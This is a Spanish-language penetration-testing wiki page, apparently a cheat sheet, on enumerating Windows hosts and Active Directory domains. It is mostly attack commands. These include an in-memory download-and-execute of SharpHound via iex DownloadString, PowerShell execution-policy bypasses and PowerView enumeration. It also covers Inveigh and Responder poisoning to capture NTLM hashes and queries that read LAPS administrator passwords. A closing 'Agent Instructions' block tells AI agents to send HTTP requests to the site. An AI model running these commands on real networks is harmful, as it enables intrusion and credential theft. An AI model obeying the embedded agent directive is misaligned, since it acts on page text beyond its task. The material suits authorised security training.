# Enumeracion
## 1. Enumeración de la máquina local
Sysinternals de Windows
[Sysinternals Suite - Windows Sysinternals | Microsoft Docs](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
```powershell
$ Get-ComputerInfo
```
* Descargar en memoria scripts
{% code overflow="wrap" %}
```powershell
$ iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1'))
```
{% endcode %}
* comprobar si un equipo no tiene parches de seguridad instalados
```powershell
$ HOSTNAME.EXE
```
```powershell
$ Get-WmiObject -Class win32_OperatingSystem | select version,buildnumber
```
```powershell
$ wmic qfe list full | findstr /i hotfix
```
En la web podemos encontrar, según la versión de build de Windows, qué vulnerabilidades le afectarían debido a falta de actualizaciones, y puede ser usado para escalar privilegios.
## 2. Enumeración del dominio
Evadir las políticas de ejecución de Powershell
```
powershell.exe -executionpolicy bypass
powershell.exe -ep bypass
Set-ExecutionPolicy Unrestricted
```
* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [ADRecon](https://github.com/sense-of-security/ADRecon/blob/master/ADRecon.ps1)
```powershell
. .\ADRecon.ps1
```
* [Powerview tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
* ver maquina del DC
```powershell
get-netcomputer
```
* Listar los usuarios del dominio
```powershell
Get-DomainUser | select -ExpandProperty cn
```
* Listar los equipos del dominio
```powershell
Get-DomainComputer
```
* Listar los dominios del forest
```powershell
Get-ForestDomain
```
* Listar los tipos de "confianza" (trust) de los dominios/forest
```powershell
Get-DomainTrust
```
```powershell
Get-ForestTrust
```
* La información de un grupo del dominio
```powershell
Get-DomainGroup "Domain Admins"
```
* Listar los miembros de un grupo del dominio
```powerquery
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername
```
* Listar shares del dominio, ignorando los default shares y check access
```powershell
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess
```
{% code overflow="wrap" %}
```powershell
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname
```
{% endcode %}
* Listar política de contraseñas
```powershell
(Get-DomainPolicy)."SystemAccess"
```
* Usuarios con el SID History (powerview)
```powershell
Get-DomainUser -LDAPFilter '(sidHistory=*)'
```
* Listar shares del dominio que el usuario actual tiene acceso
```powershell
Find-DomainShare -CheckShareAccess
```
* Comprobar configuracion de bitlocker
```powershell
manage-bde.exe -status
```
* [Capturar hashes NTLM con Inveigh](https://github.com/Kevin-Robertson/Inveigh)
```powershell
Invoke-Inveigh -HTTP N -NBNS Y -ConsoleOutput Y -EvadeRG Y
```
### LAPS
* Recurso:
```powershell
Install-Module -Name [AdmPwd.PS](http://admpwd.ps/)
```
* Si LAPS se encuentra instalado en el equipo
{% code overflow="wrap" %}
```powershell
REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul
```
{% endcode %}
```powershell
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
```
* Identificar si se encuentra instalado en el DC
```powershell
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
```
```powershell
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
```
* Listar el atributo ms-mcs-admpwd
```powershell
Get-NetComputer | Select-Object 'name','ms-mcs-admpwd'
```
```powershell
Get-DomainComputer -identity -properties ms-Mcs-AdmPwd
```
{% code overflow="wrap" %}
```powershell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
```
{% endcode %}
* Lista el usuario o grupos que tienen permisos de lectura a la propiedad de LAPS para un equipo específico
{% code overflow="wrap" %}
```powershell
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData | Select-Object -ExpandProperty distinguishedname | ForEach-Object { $*.substring($*.indexof('OU')) } | ForEach-Object {Get-ObjectAcl -ResolveGUIDs -DistinguishedName $*} | Where-Object {($*.ObjectType -like 'ms-Mcs-AdmPwd') -and ($*.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {Convert-NameToSid $*.IdentityReference} | Select-Object -ExpandProperty SID | Get-ADObject
```
{% endcode %}
* Listar la ACL para todas las OU donde algún usuario tenga permisos de lectura sobre el atributo LAPS
{% code overflow="wrap" %}
```powershell
Get-NetOU | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -like 'mc-ms-AdmPw') -and ($_.ActiveDirectoryRights -match 'ReadProperty')}| ForEach-Object{$_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;$_}
```
{% endcode %}
Network poissoning
Una vez estamos conectados a la red de la infraestructura, con [Responder ](https://github.com/lgandx/Responder)podemos suplantar los servicios de LLMNR y NBT-NS, ya que se transmiten vía UDP
```
responder -I
responder -I -Prdwv
```
### Bloodhound
Es la herramienta por excelencia para la enumeración de un dominio.
Para ello, se ha creado una [*sección*](https://github.com/securiters/SecuritersWiki/blob/main/Herramientas_BloodHound.md) explícita de la herramienta.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://wiki.securiters.com/securiters-wiki/internas/ad/enumeracion.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.